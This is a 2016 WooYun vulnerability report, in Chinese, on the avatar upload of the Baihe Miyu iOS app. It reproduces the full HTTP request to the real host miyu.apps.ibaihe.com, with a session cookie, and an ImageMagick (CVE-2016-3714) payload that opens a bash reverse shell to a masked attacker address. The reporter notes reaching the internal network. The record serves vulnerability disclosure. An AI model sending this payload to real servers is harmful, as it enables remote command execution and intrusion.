乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-06-03: 细节已通知厂商并且等待厂商处理中 2016-06-04: 厂商已经确认,细节仅向厂商公开 2016-06-14: 细节向核心白帽子及相关领域专家公开 2016-06-24: 细节向普通白帽子公开 2016-07-04: 细节向实习白帽子公开 2016-07-19: 细节向公众公开
目标:百合密语IOS APP检测发现在头像上传处存在CVE-2016-3714 - ImageMagick 命令执行
POST http://miyu.apps.ibaihe.com/user/update HTTP/1.1Host: miyu.apps.ibaihe.comContent-Type: multipart/form-data; boundary=Boundary+21678AD4911AD07ACookie: SESSIONID=8A599FECF109036CF707D19BCF8F0A8A7E3809B8C2B84839E3C1AC204E3F0640EAAF21A8534AB4048BBDA6AF5A7D2456A41ACE153F7D435B7D1A9A01C1FDD016CECC60F99738981F657CA808FA71C17F6A8E20E1D5D2ED2CDFBAC1DE748EDF54Connection: keep-aliveConnection: keep-aliveAccept: */*User-Agent: BHMY/1.4.6 (iPhone; iOS 9.3.2; Scale/2.00)Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9Content-Length: 841Accept-Encoding: gzip, deflate--Boundary+21678AD4911AD07AContent-Disposition: form-data; name="avatar"push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'pop graphic-context--Boundary+21678AD4911AD07AContent-Disposition: form-data; name="channel"iOS||iOS_9.3.2||AppSotre||iPhone 6s||Apple--Boundary+21678AD4911AD07AContent-Disposition: form-data; name="listener"0--Boundary+21678AD4911AD07AContent-Disposition: form-data; name="version"1.4.6--Boundary+21678AD4911AD07AContent-Disposition: form-data; name="avatar"; filename="2016-06-03-20-49-04-0.jpg"Content-Type: jpgpush graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2222 0>&1")'pop graphic-context --Boundary+21678AD4911AD07A--
反弹shell
ping下百合主站,发现已进内网
请多指教~
危害等级:中
漏洞Rank:10
确认时间:2016-06-04 11:58
怎么又有漏洞了
暂无